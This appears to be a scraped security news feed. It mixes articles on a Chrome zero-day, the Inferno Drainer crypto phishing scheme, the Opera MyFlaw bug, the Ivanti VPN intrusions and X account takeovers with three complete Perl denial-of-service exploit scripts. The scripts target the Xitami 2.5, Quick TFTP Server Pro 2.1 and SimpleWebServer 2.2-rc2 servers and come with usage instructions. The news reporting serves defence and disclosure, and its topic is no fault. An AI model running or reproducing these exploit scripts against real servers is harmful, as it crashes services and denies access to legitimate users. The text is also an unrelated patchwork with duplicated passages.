Google on Tuesday released updates to fix four security issues in its Chrome browser, including an actively exploited zero-day flaw.
The issue, tracked as CVE-2024-0519, concerns an out-of-bounds memory access in the V8 JavaScript and WebAssembly engine, which can be weaponized by threat actors to trigger a crash.
"By reading out-of-bounds memory, an attacker might be able to get secret values,

Browser Security / Vulnerability

Google on Tuesday released updates to fix four security issues in its Chrome browser, including an actively exploited zero-day flaw.

The issue, tracked as **CVE-2024-0519**, concerns an out-of-bounds memory access in the V8 JavaScript and WebAssembly engine, which can be weaponized by threat actors to trigger a crash.

"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service," according to MITRE's Common Weakness Enumeration (CWE).

Additional details about the nature of the attacks and the threat actors that may be exploiting them have withheld in an attempt to prevent further exploitation. The issue was reported anonymously on January 11, 2024.

"Out-of-bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," reads a description of the flaw on the NIST's National Vulnerability Database (NVD).

The development marks the first actively exploited zero-day to be patched by Google in Chrome in 2024. Last year, the tech giant resolved a total of 8 such actively exploited zero-days in the browser.

Users are recommended to upgrade to Chrome version 120.0.6099.224/225 for Windows, 120.0.6099.234 for macOS, and 120.0.6099.224 for Linux to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zero-Day Alert: Update Chrome Now to Fix New Actively Exploited Vulnerability

By Deeba Ahmed
Group-IB Global Pvt. Ltd. has revealed shocking details on Inferno Drainer, a phishing operation targeting cryptocurrency wallet providers.…
This is a post from HackRead.com Read the original post: Inferno Drainer Phishing Nets Scammers $80M from Crypto Wallets

Group-IB Global Pvt. Ltd. has revealed shocking details on Inferno Drainer, a phishing operation targeting cryptocurrency wallet providers. The scam, involving the deployment of a multichain crypto drainer, operated under a scam-as-a-service model, targeted over 100 brands and 16,000 malicious domains, stealing over $80 million in digital assets from November 2022 to November 2023. It ceased operating in November 2023 after causing significant financial damage.

The Inferno Drainer team is “estimated to have reaped over $87 million in illicit profits by scamming over 137,000 victims,” Group-IB’s blog post read.

Researchers discovered over 14,000 phishing websites with malicious scripts impersonating Seaport, WalletConnect, and Coinbase protocols, with over 5,500 spoofed and 550 scripted. The scammers’ Telegram channel description only mentions @Mr\_inferno\_Drainer, supposedly its developer and tech support provider, whereas the team’s first public mention was on the day the channel was created, on November 5, 2022.

Inferno Drainer team used high-quality phishing pages to lure unsuspecting users to their websites. They targeted victims via social media platforms like X, Telegram, and Discord, offering free tokens called airdrops and rewards for minting nonfungible tokens. Google-owned Mandiant’s X account was also compromised, distributing links to a phishing page hosting a cryptocurrency drainer called CLINKSINK.

Group-IB analyzed 500 domains and found a JavaScript-based drainer hosted by a user “kuzdaz” on a GitHub repository. Another set of 350 sites was found on a different repository.

These sites lured victims to connect their wallets for potential riches while the malicious scripts were designed to complete unauthorized transactions. The scam operators claimed a flat rate of 20% of stolen assets, while affiliates retained 80% of their gains. They spoofed Web3 protocols (including Seaport, WalletConnect, and Coinbase) under DApps to initiate malicious transactions.

For affiliates, it offered a customer panel to customize malware features and detailed statistics, including the number of victims connecting to their wallets on each phishing website, the number of confirmed transactions, and the stolen assets’ value.

Group-IB’s High-Tech Crime Investigation Department’s Andrey Kolmakov stated that despite the group’s claim to shut down its operations in November, this control panel remained active throughout December, allowing other hackers to exploit the situation.

“Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers continue to develop further,” Kolmakov noted.

****_**_RELATED ARTICLES_**_****

1.  **Scammers Selling Twitter (X) Gold Accounts Fueling Disinfo, Phishing**
2.  **Multilingual malware hits Android devices for phishing & cryptomining**
3.  **Hacker stole $55M worth of crypto from DeFi lender bZx via phishing**
4.  **Hackers Aim at Crypto Wallets with Hacked Namecheap Phishing Emails**
5.  **Cryptocurrency losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

Inferno Drainer Phishing Nets Scammers $80M from Crypto Wallets

The operators behind the now-defunct Inferno Drainer created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023.
The scheme “leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers’ infrastructure that spoofed Web3 protocols to trick victims into authorizing

Cryptocurrency / Cyber Threat

The operators behind the now-defunct **Inferno Drainer** created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023.

The scheme “leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers’ infrastructure that spoofed Web3 protocols to trick victims into authorizing transactions,” Singapore-headquartered Group-IB said in a report shared with The Hacker News.

Inferno Drainer, which was active from November 2022 to November 2023, is estimated to have reaped over $87 million in illicit profits by scamming more than 137,000 victims.

The malware is part of a broader set of similar offerings that are available to affiliates under the scam-as-a-service (or drainer-as-a-service) model in exchange for a 20% cut of their earnings.

What’s more, customers of Inferno Drainer could either upload the malware to their own phishing sites, or make use of the developer’s service for creating and hosting phishing websites, either at no extra cost or charging 30% of the stolen assets in some cases.

According to Group-IB, the activity spoofed upwards of 100 cryptocurrency brands via specially crafted pages that were hosted on over 16,000 unique domains.

Further analysis of 500 of these domains has revealed that the JavaScript-based drainer was hosted initially on a GitHub repository (kuzdaz.github\[.\]io/seaport/seaport.js) before incorporating them directly on the websites. The user “kuzdaz” currently does not exist.

In a similar fashion, another set of 350 sites included a JavaScript file, “coinbase-wallet-sdk.js,” on a different GitHub repository, “kasrlorcian.github\[.\]io.”

These sites were then propagated on sites like Discord and X (formerly Twitter), enticing potential victims into clicking them under the guise of offering free tokens (aka airdrops) and connecting their wallets, at which point their assets are drained once the transactions are approved.

In using the names seaport.js, coinbase.js and wallet-connect.js, the idea was to masquerade as popular Web3 protocols like Seaport, WalletConnect, and Coinbase to complete the unauthorized transactions. The earliest website containing one of these scripts dates back to May 15, 2023.

“Another typical feature of phishing websites belonging to Inferno Drainer was that users cannot open website source code by using hotkeys or right-clicking on the mouse,” Group-IB analyst Viacheslav Shevchenko said. “This means that the criminals attempted to hide their scripts and illegal activity from their victims.”

It’s worth noting that Google-owned Mandiant’s X account was compromised earlier this month to distribute links to a phishing page hosting a cryptocurrency drainer tracked as CLINKSINK.

“Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers continue to develop further,” Andrey Kolmakov, head of Group-IB’s High-Tech Crime Investigation Department, said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Inferno Malware Masqueraded as Coinbase, Drained $87 Million from 137,000 Victims

Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system.
The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it

Vulnerability / Browser Security

Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system.

The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it possible to sync messages and files between mobile and desktop devices.

"This is achieved through a controlled browser extension, effectively bypassing the browser's sandbox and the entire browser process," the company said in a statement shared with The Hacker News.

The issue impacts both the Opera browser and Opera GX. Following responsible disclosure on November 17, 2023, it was addressed as part of updates shipped on November 22, 2023.

My Flow features a chat-like interface to exchange notes and files, the latter of which can be opened via a web interface, meaning a file can be executed outside of the browser's security boundaries.

It is pre-installed in the browser and facilitated by means of a built-in (or internal) browser extension called "Opera Touch Background," which is responsible for communicating with its mobile counterpart.

This also means that the extension comes with its own manifest file specifying all the required permissions and its behavior, including a property known as externally\_connectable that declares which other web pages and extensions can connect to it.

In the case of Opera, the domains that can talk to the extension should match the patterns "\*.flow.opera.com" and ".flow.op-test.net" – both controlled by the browser vendor itself.

"This exposes the messaging API to any page that matches the URL patterns you specify," Google notes in its documentation. "The URL pattern must contain at least a second-level domain."

Guardio Labs said it was able to unearth a "long-forgotten" version of the My Flow landing page hosted on the domain "web.flow.opera.com" using the urlscan.io website scanner tool.

"The page itself looks quite the same as the current one in production, but changes lie under the hood: Not only that it lacks the \[content security policy\] meta tag, but it also holds a script tag calling for a JavaScript file without any integrity check," the company said.

"This is exactly what an attacker needs – an unsafe, forgotten, vulnerable to code injection asset, and most importantly, has access to (very) high permission native browser API."

The attack chain then hinges, creating a specially crafted extension that masquerades as a mobile device to pair with the victim's computer and transmit an encrypted malicious payload via the modified JavaScript file to the host for subsequent execution by prompting the user to click anywhere on the screen.

The findings highlight the increasing complexity of browser-based attacks and the different vectors that can be exploited by threat actors to their advantage.

"Despite operating in sandboxed environments, extensions can be powerful tools for hackers, enabling them to steal information and breach browser security boundaries," the company told The Hacker News.

"This underscores the need for internal design changes at Opera and improvements in Chromium's infrastructure. For instance, disabling third-party extension permissions on dedicated production domains, similar to Chrome's web store, is recommended but has not yet been implemented by Opera."

When reached for comment, Opera said it moved quickly to close the security hole and implement a fix on the server side and that it's taking steps to prevent such issues from happening again.

"Our current structure uses an HTML standard, and is the safest option that does not break key functionality," the company said. "After Guardio alerted us to this vulnerability, we removed the cause of these issues and we are making sure that similar problems will not appear in the future."

"We would like to thank Guardio Labs for their work on uncovering and immediately alerting us to this vulnerability. This collaboration demonstrates how we work together with security experts and researchers around the world to complement our own efforts at maintaining and improving the security of our products and ensuring our users have a safe online experience."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Opera MyFlaw Bug Could Let Hackers Run ANY File on Your Mac or Windows

Xitami version 2.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 14 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5 Denial Of Service

The US Securities and Exchange Commission and security firm Mandiant both had their X accounts breached, possibly due to changes to X’s two-factor authentication settings. Here’s how to fix yours.

This week, the United States Securities and Exchange Commission (SEC) suffered an embarrassing—and market-moving—breach in which a hacker gained access to its X social media account and published fake information about a highly anticipated SEC announcement related to bitcoin. The agency regained control of its account and deleted the post in under an hour, but the situation is troubling, especially given that the prominent and well-respected security firm Mandiant, which is owned by Google, had its X account compromised in a similar incident last week.

Details are still emerging about exactly what happened in each case, but there are common threads that made the account takeovers possible—and there are ways to protect yourself.

Crucially, both accounts had the digital protection known as “two-factor authentication” disabled at the time of the takeovers. Also known as 2FA, the defense requires a rotating numeric code or physical dongle in addition to a person's login credentials, so everything isn't resting on just a username and password. The SEC has not yet said whether it had two-factor turned off accidentally as a result of X's February 2023 policy change, which made it so only accounts paying for a Blue subscription would have access to two-factor codes sent via text message. Mandiant implied on Wednesday that this change was the reason it did not have the protection turned on for its X account, saying, “Normally, 2FA would have mitigated this, but due to some team transitions and a change in X’s 2FA policy, we were not adequately protected.”

Mandiant said hackers were able to guess the password protecting its X account in “a brute force” attack. X itself said on Tuesday that the SEC account hack was the result of “an unidentified individual obtaining control over a phone number associated with the @SECGov account through a third party.”

The two incidents lay out a punch list of the most important steps you can take to lock down your X account. First, ensure that your account is protected by a strong, unique password. Second, turn on two-factor for your account or, if you think you already have it on, check to make sure. X’s move to make people pay for a basic form of two-factor is problematic. It also created confusion because the company prompted free users to switch away from SMS two-factor, but then seemingly simply turned off the protection altogether for those who didn’t. This likely left a group of users in a situation where they think they have two-factor authentication on, but actually don’t.

To confirm that you have two-factor on, or to enable it for the first time, log into your X account, go to **Settings and privacy**, then **Security and account access**, **Security**, and then **Two-factor authentication**. (You can also click here if you're already logged into X). On that screen, you can choose between using two-factor authentication with a code-generating app or a physical security key. You can also generate backup codes for your account to log in to X even if you lose access to your second factor.

Finally, check that there isn't a phone number linked to your X account that can be used for account recovery. Twitter uses phone numbers to “verify” high-profile accounts and also offers a feature called “Additional password protection,” through which “you must provide either the phone number or email address associated with your account in order to reset your password.” It seems, though, that by having a phone number associated with its X account, the SEC was putting itself at greater risk, because attackers could gain control of the account by first taking over the associated phone number using an attack known as a SIM swap.

“Remove your phone number from Twitter altogether to ensure you avoid the SIM-swap threat with Twitter's risky text-message-based password reset flow,” says Rachel Tobac, a longtime account compromise researcher and CEO of SocialProof Security. She adds that X users should “turn on 2FA—I recommend app-based at the very least—and ensure you have a strong password on the account."

Though X has made it more convoluted to enable strong account security, it’s worth learning from the SEC and Mandiant’s mistakes.

How to Stop Your X Account From Getting Hacked Like the SEC's

The FCC wants car makers and wireless providers to make it harder for stalkers to use your car against you.

Most new model cars are not just cars anymore. With multiple digital systems, vehicles are increasingly plugged into web applications and digital processes. Some of them are basically smartphones on wheels.

Even if we assume these new features were all created with your convenience in mind, some of them can have some adverse effects on your privacy, and sometimes even your safety.

Addressing the use of connected cars to stalk, intimidate, and harass survivors of domestic violence, the Federal communications Commission (FCC) has issued a press release calling on carmakers and wireless companies to help ensure the independence and safety of domestic violence survivors.

Chairwoman Jessica Rosenworcel of the FCC said:

> “No survivor of domestic violence and abuse should have to choose between giving up their car and allowing themselves to be stalked and harmed by those who can access its data and connectivity.”

We have previously talked about cars spying on you, and the poor privacy policies that allow manufacturers to sell the data they gather for targeted advertising. We have also written about a federal judge that ruled it’s fine for car makers to intercept your text messages. But those are privacy concerns. Valid and serious, but on a different level from running the risk of being harassed by a jealous ex.

For readers focused on the privacy issues of connected cars, we can recommend the Mozilla report It’s Official: Cars Are the Worst Product Category We Have Ever Reviewed for Privacy. And when you are parting with a car in the US, you may want to look at the Privacy4Cars app that can provide a Vehicle Privacy Report and claims to be able to delete your data. You will need your Vehicle Identification Number (VIN).

The FCC also asked wireless service providers (AT&T, T-Mobile and Verizon) to describe their partnerships with car manufacturers, seeking information on how the wireless providers work with them and what their policies are for handling geolocation data provided by car manufacturers.

The FCC press release includes statistics showing that more than 12 million people each year are the victims of rape, physical violence, and stalking.

**Tips to keep a stalker from tracking your car**

Not all cars offer these options, and the tips may not apply to your situation, but here are some general tips for people that are afraid they are the target of a stalker:

*   Use the navigation app on your phone, rather than the one built into your car.
*   Do not store places you visit regularly in the car’s navigation.
*   Consider using a VPN when you connect to your car’s hotspot.
*   Find out which devices can access the car or its location data by using any “remote access” apps for the car and remove the devices that are not under your control.
*   Familiarize yourself with the car manufacturer’s privacy policy so you know where your data might be sent. To give you an idea, data might end up with advertisers, law enforcement, service providers, the car manufacturer and its dealers, tech giants like Apple, Google, and Amazon, connected service providers, and government agencies.
*   Keep the software updated to make sure your car is equipped with the latest protection against potential intrusions.
*   If the suspected stalker has been near your vehicle, inspect it thoroughly for trackers and other unfamiliar hardware.
*   Try not to travel alone and always park in a well-lit, busy area if you are concerned about your physical safety.
*   If you have a dashcam that uses cloud storage, check who has access to the images. They can be used to track your movements.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 FCC wants cars to make life harder for stalkers 

Quick TFTP Server Pro version 2.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 12 january 2024  
# Vendor Homepage: https://www.tallsoft.com/  
# Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Quick TFTP Server Pro 2.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to TFTP.  
#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $filename = "exploit";

$shell = "A"x317;

my $mode = "A" x 1360;

my $muha = "\x00\x02" .$filename . "\x00" .$mode;

socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";  
send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!";  

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Quick TFTP Server Pro 2.1 Denial Of Service

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.
"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an

Vulnerability / Threat Intelligence

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.

"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker **UNC5221**.

The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances.

Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

According to Ivanti, the intrusions impacted less than 10 customers, indicating that this could be a highly-targeted campaign. Patches for the two vulnerabilities (informally called ConnectAround) are expected to become available in the week of January 22.

Mandiant's analysis of the attacks has revealed the presence of five different custom malware families, besides injecting malicious code into legitimate files within ICS and using other legitimate tools like BusyBox and PySoxy to facilitate subsequent activity.

"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said.

LIGHTWIRE is one of the two web shells, the other being WIREFIRE, which are "lightweight footholds" designed to ensure persistent remote access to compromised devices. While LIGHTWIRE is written in Perl CGI, WIREFIRE is implemented in Python.

Also used in the attacks are a JavaScript-based credential stealer dubbed WARPWIRE and a passive backdoor named ZIPLINE that's capable of downloading/uploading files, establishing a reverse shell, creating a proxy server, and setting up a tunneling server to dispatch traffic between multiple endpoints.

"This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released," Mandiant further added.

UNC5221 has not been linked to any previously known group or a particular country, although the targeting of edge infrastructure by weaponizing zero-day flaws and the use of compromise command-and-control (C2) infrastructure to bypass detection bears all the hallmarks of an advanced persistent threat (APT).

"UNC5221's activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors," Mandiant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

SimpleWebServer version 2.2-rc2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 11 january 2024  
# Vendor Homepage:  http://www.pmx.it/  
# Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSimpleWebServer 2.2-rc2   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

our $exploit = "\x41"x2014;

$exploit     = "x\41"x2104;

if ($socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "TCP"))  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";  
        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $ip failed!\n";  
    exit;  
}

              print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                        ,,__  
              ..  ..   / o._)           
             /--'/--\  \-'||    
            /        \_/ / |    
          .'\  \__\  __.'.'     
            )\ |  )\ |        
           // \\ // \\  
          ||_  \\|_  \\_  
          '--' '--'' '--'  

                [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#google